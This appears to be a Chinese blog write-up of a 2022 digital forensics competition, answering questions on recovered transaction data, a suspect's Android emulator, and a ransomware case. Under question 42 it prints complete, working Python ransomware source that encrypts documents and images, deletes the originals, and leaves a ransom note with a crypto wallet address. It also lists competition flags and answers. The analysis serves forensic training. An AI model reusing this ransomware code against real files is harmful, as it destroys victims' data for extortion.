<h3 id="30-还原全部被删改数据，哪些用户ID没有充值记录"><a href="#30-还原全部被删改数据，哪些用户ID没有充值记录" class="headerlink" title="30 还原全部被删改数据，哪些用户ID没有充值记录"></a>30 还原全部被删改数据，哪些用户ID没有充值记录</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106143841605.png" alt="image-20230106143841605"></p>
<p>318.989</p>
<h3 id="31-还原全部被删改数据，2022年10月17日总计产生多少笔交易记录？"><a href="#31-还原全部被删改数据，2022年10月17日总计产生多少笔交易记录？" class="headerlink" title="31 还原全部被删改数据，2022年10月17日总计产生多少笔交易记录？"></a>31 还原全部被删改数据，2022年10月17日总计产生多少笔交易记录？</h3><h3 id=""><a href="#" class="headerlink" title=""></a><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106144633762.png" alt="image-20230106144633762"></h3><h3 id="第二页就是10月18号的了"><a href="#第二页就是10月18号的了" class="headerlink" title="第二页就是10月18号的了"></a>第二页就是10月18号的了</h3><p><strong>1000</strong></p>
<h3 id="32-还原全部被删改数据，该网站中充值的USDT总额为"><a href="#32-还原全部被删改数据，该网站中充值的USDT总额为" class="headerlink" title="32 还原全部被删改数据，该网站中充值的USDT总额为"></a>32 还原全部被删改数据，该网站中充值的USDT总额为</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106145333021.png" alt="image-20230106145333021"></p>
<p>导出数据后求和</p>
<p><strong>408228</strong></p>
<h2 id="检材四"><a href="#检材四" class="headerlink" title="检材四"></a>检材四</h2><p>检材4.根据前期侦查分析，通过技术手段找到了幕后老板，并对其使用的安卓模拟器“检材4”进行了固定。分析所有掌握的检材，回答下列问题</p>
<h3 id="33-嫌疑人使用的安卓模拟器软件名称是"><a href="#33-嫌疑人使用的安卓模拟器软件名称是" class="headerlink" title="33 嫌疑人使用的安卓模拟器软件名称是"></a>33 嫌疑人使用的安卓模拟器软件名称是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107132454098.png" alt="image-20230107132454098"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107132558838.png" alt="image-20230107132558838"></p>
<p>夜神.nox</p>
<h3 id="34-检材4中，“老板”的阿里云账号是"><a href="#34-检材4中，“老板”的阿里云账号是" class="headerlink" title="34 检材4中，“老板”的阿里云账号是"></a>34 检材4中，“老板”的阿里云账号是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107142042131.png" alt="image-20230107142042131"></p>
<p><strong>forensixtech1</strong></p>
<h3 id="35-检材4中安装的VPN工具的软件名称是"><a href="#35-检材4中安装的VPN工具的软件名称是" class="headerlink" title="35 检材4中安装的VPN工具的软件名称是"></a>35 检材4中安装的VPN工具的软件名称是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107135119448.png" alt="image-20230107135119448"></p>
<p>v2Ray</p>
<h3 id="36-上述VPN工具中记录的节点IP是"><a href="#36-上述VPN工具中记录的节点IP是" class="headerlink" title="36 上述VPN工具中记录的节点IP是"></a>36 上述VPN工具中记录的节点IP是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107135139153.png" alt="image-20230107135139153"></p>
<p>38.68.135.18</p>
<h3 id="37-检材4中，录屏软件安装时间为"><a href="#37-检材4中，录屏软件安装时间为" class="headerlink" title="37 检材4中，录屏软件安装时间为"></a>37 检材4中，录屏软件安装时间为</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107144828633.png" alt="image-20230107144828633"></p>
<p>2022&#x2F;10&#x2F;19 10:50:27</p>
<h3 id="38-上述录屏软件中名为“s-20221019105129”的录像，在模拟器存储中对应的原始文件名为"><a href="#38-上述录屏软件中名为“s-20221019105129”的录像，在模拟器存储中对应的原始文件名为" class="headerlink" title="38 上述录屏软件中名为“s_20221019105129”的录像，在模拟器存储中对应的原始文件名为"></a>38 上述录屏软件中名为“s_20221019105129”的录像，在模拟器存储中对应的原始文件名为</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107145338092.png" alt="image-20230107145338092"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107145324595.png" alt="image-20230107145324595"></p>
<p>0c2f5dd4a9bc6f34873fb3c0ee9b762b98e8c46626410be7191b11710117a12d39 </p>
<h3 id="39上述录屏软件登录的手机号是"><a href="#39上述录屏软件登录的手机号是" class="headerlink" title="39上述录屏软件登录的手机号是"></a>39上述录屏软件登录的手机号是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107150017561.png" alt="image-20230107150017561"></p>
<p>18645091802</p>
<h3 id="40-检材4中，发送勒索邮件的邮箱地址为"><a href="#40-检材4中，发送勒索邮件的邮箱地址为" class="headerlink" title="40 检材4中，发送勒索邮件的邮箱地址为"></a>40 检材4中，发送勒索邮件的邮箱地址为</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107150108778.png" alt="image-20230107150108778"></p>
<p><a href="mailto:&#115;&#107;&#x74;&#101;&#114;&#114;&#97;&#x6e;&#64;&#49;&#x36;&#x33;&#46;&#x63;&#111;&#109;">&#115;&#107;&#x74;&#101;&#114;&#114;&#97;&#x6e;&#64;&#49;&#x36;&#x33;&#46;&#x63;&#111;&#109;</a></p>
<p>分析所有掌握的检材，找到勒索邮件中被加密的文档和对应的加&#x2F;解密程序，并回答下列问题</p>
<h3 id="41-分析加密程序，编译该加密程序使用的语言是"><a href="#41-分析加密程序，编译该加密程序使用的语言是" class="headerlink" title="41 分析加密程序，编译该加密程序使用的语言是"></a>41 分析加密程序，编译该加密程序使用的语言是</h3><p>在检材2中的D盘中，就能发现加密程序和解密文件，图标一看就是python的</p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230106151409271.png" alt="image-20230106151409271"></p>
<p>python</p>
<h3 id="42-分析加密程序，它会加密哪些扩展名的文件？"><a href="#42-分析加密程序，它会加密哪些扩展名的文件？" class="headerlink" title="42 分析加密程序，它会加密哪些扩展名的文件？"></a>42 分析加密程序，它会加密哪些扩展名的文件？</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> timefrom Crypto.PublicKey <span class="keyword">import</span> RSAfrom Crypto.Cipher <span class="keyword">import</span> PKCS1_v1_5 <span class="keyword">as</span> Cipher_pkcs1_v1_5import os</span><br><span class="line">pubkey = <span class="string">&#x27;-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n&#x27;</span>msg = <span class="string">&quot;SOMETHING WENT WRONG,PLEASE CONTACT YOUR SYSTEM ADMINISTRATOR!\nHe can help you to understand whats happened.\nIf he can&#x27;t help you,contact us via email:\naa1028@forensix.cn\nale@forensix.cn\nHURRY UP!WE HAVE ANTIDOTE FOR YOUR FILES!DISCOUNT 20%FOR CLIENTS,WHO CONTACT US IN THE SAME DAY!\nYou can attach 2 files (text or picture)to check our honest intentions,we will heal them and send\nback.\nPlease pay 0.618 ETH\nThe wallet address：0xef9edf6cdacb7d925aee0f9bd607b544c5758850\n************************************\n&quot;</span><span class="keyword">class</span> <span class="title class_">XORCBC</span>:</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, key: <span class="built_in">bytes</span></span>):</span><br><span class="line">        self.key = <span class="built_in">bytearray</span>(key)</span><br><span class="line">        self.cur = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">encrypt</span>(<span class="params">self, data: <span class="built_in">bytes</span></span>) -&gt; <span class="built_in">bytes</span>:</span><br><span class="line">        data = <span class="built_in">bytearray</span>(data)</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(data)):</span><br><span class="line">            tmp = data[i]</span><br><span class="line">            data[i] ^= self.key[self.cur]</span><br><span class="line">            self.key[self.cur] = tmp</span><br><span class="line">            self.cur = (self.cur + <span class="number">1</span>) % <span class="built_in">len</span>(self.key)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">bytes</span>(data)<span class="built_in">print</span>(<span class="string">&#x27;加密程序V1.0&#x27;</span>)<span class="built_in">print</span>(<span class="string">&#x27;文件正在加密中~~~~~~~~~~~~~~~~~~\n&#x27;</span>)<span class="keyword">def</span> <span class="title function_">run_finall</span>():</span><br><span class="line">    <span class="keyword">for</span> filepath, dirnames, filenames <span class="keyword">in</span> os.walk(os.getcwd()):</span><br><span class="line">        <span class="keyword">for</span> filename <span class="keyword">in</span> filenames:</span><br><span class="line">            <span class="keyword">if</span> filename != <span class="string">&#x27;encrypt_file.py&#x27;</span> <span class="keyword">and</span> filename != <span class="string">&#x27;decrypt_file.py&#x27;</span> <span class="keyword">and</span> <span class="string">&#x27;_encrypted&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> filename:</span><br><span class="line">                ExtensionPath = os.path.splitext(filename)[(-<span class="number">1</span>)]</span><br><span class="line">                <span class="keyword">if</span> <span class="string">&#x27;.txt&#x27;</span> == ExtensionPath <span class="keyword">or</span> <span class="string">&#x27;.jpg&#x27;</span> == ExtensionPath <span class="keyword">or</span> <span class="string">&#x27;.xls&#x27;</span> == ExtensionPath <span class="keyword">or</span> <span class="string">&#x27;.docx&#x27;</span> == ExtensionPath:</span><br><span class="line">                    time.sleep(<span class="number">3</span>)</span><br><span class="line">                    data_file = os.path.join(filepath, filename)</span><br><span class="line">                    rsakey = RSA.import_key(pubkey)</span><br><span class="line">                    cipher = Cipher_pkcs1_v1_5.new(rsakey)</span><br><span class="line">                    xor_key = os.urandom(<span class="number">16</span>)</span><br><span class="line">                    xor_obj = XORCBC(xor_key)</span><br><span class="line">                    outf = <span class="built_in">open</span>(data_file + <span class="string">&#x27;_encrypted&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>)</span><br><span class="line">                    encrypted_xor_key = cipher.encrypt(xor_key)</span><br><span class="line">                    outf.write(encrypted_xor_key)</span><br><span class="line">                    buffer_size = <span class="number">4096</span></span><br><span class="line">                    <span class="keyword">with</span> <span class="built_in">open</span>(data_file, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> (f):</span><br><span class="line">                        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">                            data = f.read(buffer_size)</span><br><span class="line">                            <span class="keyword">if</span> <span class="keyword">not</span> data:</span><br><span class="line">                                <span class="keyword">break</span></span><br><span class="line">                            outf.write(xor_obj.encrypt(data))</span><br><span class="line"></span><br><span class="line">                    outf.close()</span><br><span class="line">                    os.remove(data_file)run_finall()<span class="keyword">def</span> <span class="title function_">redme</span>():</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="built_in">dir</span> = os.path.join(os.path.expanduser(<span class="string">&#x27;~&#x27;</span>), <span class="string">&#x27;Desktop&#x27;</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="built_in">dir</span>)</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(<span class="built_in">dir</span> + <span class="string">&#x27;/!READ_ME.txt&#x27;</span>, <span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> (ff):</span><br><span class="line">            ff.write(msg)</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        dir1 = os.getcwd()</span><br><span class="line">        <span class="built_in">print</span>(dir1)</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(dir1 + <span class="string">&#x27;/!READ_ME.txt&#x27;</span>, <span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> (ff):</span><br><span class="line">            ff.write(msg)<span class="built_in">print</span>(<span class="string">&#x27;\n加密完成~~~~~~~~~~~~~~~~~~&#x27;</span>)os.system(<span class="string">&#x27;pause&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>txt.jpg.docx.xls</p>
<h3 id="43-分析加密程序，是通过什么算法对文件进行加密的？"><a href="#43-分析加密程序，是通过什么算法对文件进行加密的？" class="headerlink" title="43 分析加密程序，是通过什么算法对文件进行加密的？"></a>43 分析加密程序，是通过什么算法对文件进行加密的？</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107151243377.png" alt="image-20230107151243377"></p>
<p>异或</p>
<h3 id="44-分析加密程序，其使用的非对称加密方式公钥后5位为？"><a href="#44-分析加密程序，其使用的非对称加密方式公钥后5位为？" class="headerlink" title="44 分析加密程序，其使用的非对称加密方式公钥后5位为？"></a>44 分析加密程序，其使用的非对称加密方式公钥后5位为？</h3><p> pubkey &#x3D; ‘—–BEGIN PUBLIC KEY—–\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU&#x2F;4Byd2i9BvIbRn\nHLFZvi&#x2F;VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY&#x2F;AMnjYPy9CaYzi\nSOT4PCf&#x2F;O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX&#x2F;kd0GsQP3Zbogazj&#x2F;z7OM0Y3rv3T8mtF6&#x2F;I\nkwIEHoau+w&#x3D;&#x3D;\n—–END PUBLIC KEY—–\n’</p>
<p>u+w&#x3D;&#x3D;</p>
<h3 id="45-被加密文档中，FLAG1的值是"><a href="#45-被加密文档中，FLAG1的值是" class="headerlink" title="45 被加密文档中，FLAG1的值是"></a>45 被加密文档中，FLAG1的值是</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107151413276.png" alt="image-20230107151413276"></p>
<p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107151421978.png" alt="image-20230107151421978"></p>
<img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230107151447454.png" alt="image-20230107151447454" style="zoom:80%;" />

<p>TREFWGFS</p>
<p>分析所有掌握的检材，找到报案人描述的加密勒索apk程序，分析并回答下列问题</p>
<h3 id="46-恶意APK程序的包名为"><a href="#46-恶意APK程序的包名为" class="headerlink" title="46 恶意APK程序的包名为"></a>46 恶意APK程序的包名为</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230108123124053.png" alt="image-20230108123124053"></p>
<p>cn.forensix.changancup</p>
<h3 id="47-APK调用的权限包括"><a href="#47-APK调用的权限包括" class="headerlink" title="47 APK调用的权限包括"></a>47 APK调用的权限包括</h3><p><img src="https://supersonw-1311119830.cos.ap-beijing.myqcloud.com/image-20230108123159429.png" alt="image-20230108123159429"></p>
<p>READ_EXTERNAL_STORAGE；WRITE_EXTERNAL_STORAGE；</p>
<h3 id="48-解锁第一关所使用的FLAG2值为"><a href="#48-解锁第一关所使用的FLAG2值为" class="headerlink" title="48 解锁第一关所使用的FLAG2值为"></a>48 解锁第一关所使用的FLAG2值为</h3><p>MATSFRKG</p>
<h3 id="49-解锁第二关所使用的FLAG3值为"><a href="#49-解锁第二关所使用的FLAG3值为" class="headerlink" title="49 解锁第二关所使用的FLAG3值为"></a>49 解锁第二关所使用的FLAG3值为</h3><p>TDQ2UWP9</p>
<h3 id="50-解锁第三关所需的KEY值由ASCII可显示字符组成，请请分析获取该KEY值"><a href="#50-解锁第三关所需的KEY值由ASCII可显示字符组成，请请分析获取该KEY值" class="headerlink" title="50 解锁第三关所需的KEY值由ASCII可显示字符组成，请请分析获取该KEY值"></a>50 解锁第三关所需的KEY值由ASCII可显示字符组成，请请分析获取该KEY值</h3><p>a_asd.&#x2F;1imc2)dd1234]_+&#x3D;+</p>
<p>这几道题摆了，不会，不想学，不想做。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>经过几天的复盘，的确发现了自己很多方面存在不足，实话说自己真是啥都不会。2022年长安杯赛题相较于前几年的题有较大的跨度，难度也有了一定的提升，在最后的几道题里也加入了ctf相关的赛题。对个人能力有了相应地挑战。不过经过了这几天的复盘，自己的取证相关的知识也有了相应地提升，取证涉及到的技术太多了，需要我去学习的东西也太多了，所以现在才刚刚起步，多多益善，百炼成钢。</p>

</div>

<!-- post-guide -->

    <div class="post-guide">
        <div class="item left">
            
              <a href="/2023/05/14/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/AI/openpose%E9%83%A8%E7%BD%B2/">
                  <i class="fa fa-angle-left" aria-hidden="true"></i>
                  Windows下的openpose实战部署操作
              </a>
            
        </div>
        <div class="item right">
            
              <a href="/2022/11/06/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%9B%98/%E7%BE%8E%E4%BA%9A%E6%9D%AF2021%E5%A4%8D%E7%9B%98/">
                2021美亚杯复盘
                <i class="fa fa-angle-right" aria-hidden="true"></i>
              </a>
            
        </div>
    </div>


<!-- comment - giscus -->


<!-- comment - valine -->


<script>
	
	
    // 显示次数
		function showTime(Counter) {
			var query = new AV.Query("Counter");
			if($(".leancloud_visitors").length > 0){
				var url = $(".leancloud_visitors").attr('id').trim();
				// where field
				query.equalTo("words", url);
				// count
				query.count().then(function (number) {
					// There are number instances of MyClass where words equals url.
					$(document.getElementById(url)).text(number?  number : '--');
				}, function (error) {
					// error is an instance of AVError.
				});
			}
		}
		// 追加pv
		function addCount(Counter) {
			var url = $(".leancloud_visitors").length > 0 ? $(".leancloud_visitors").attr('id').trim() : 'wujun234.github.io';
			var Counter = AV.Object.extend("Counter");
			var query = new Counter;
			query.save({
				words: url
			}).then(function (object) {
			})
		}
		$(function () {
			var Counter = AV.Object.extend("Counter");
			addCount(Counter);
			showTime(Counter);
		});
	
</script>
	</div>
	<div id="footer">
	<p>
	©<span id="footerYear-start"></span>-<span id="footerYear-end"></span>
	<a href="/">SUPER</a> 
	
	
		|
		<span id="busuanzi_container_site_pv">
			pv
			<span id="busuanzi_value_site_pv"></span>
		</span>
		|
		<span id="busuanzi_container_site_uv"> 
			uv
			<span id="busuanzi_value_site_uv"></span>
		</span>
	
	<br>
	I think I gonna miss you。
	</p>
</div>


<script type="text/javascript">
	document.getElementById('footerYear-start').innerHTML = new Date().getFullYear() + '';
</script>

<script type="text/javascript">
	document.getElementById('footerYear-end').innerHTML = new Date().getFullYear() + '';
</script>

	<button id="totop-toggle" class="toggle"><i class="fa fa-angle-double-up" aria-hidden="true"></i></button>
</body>
</html>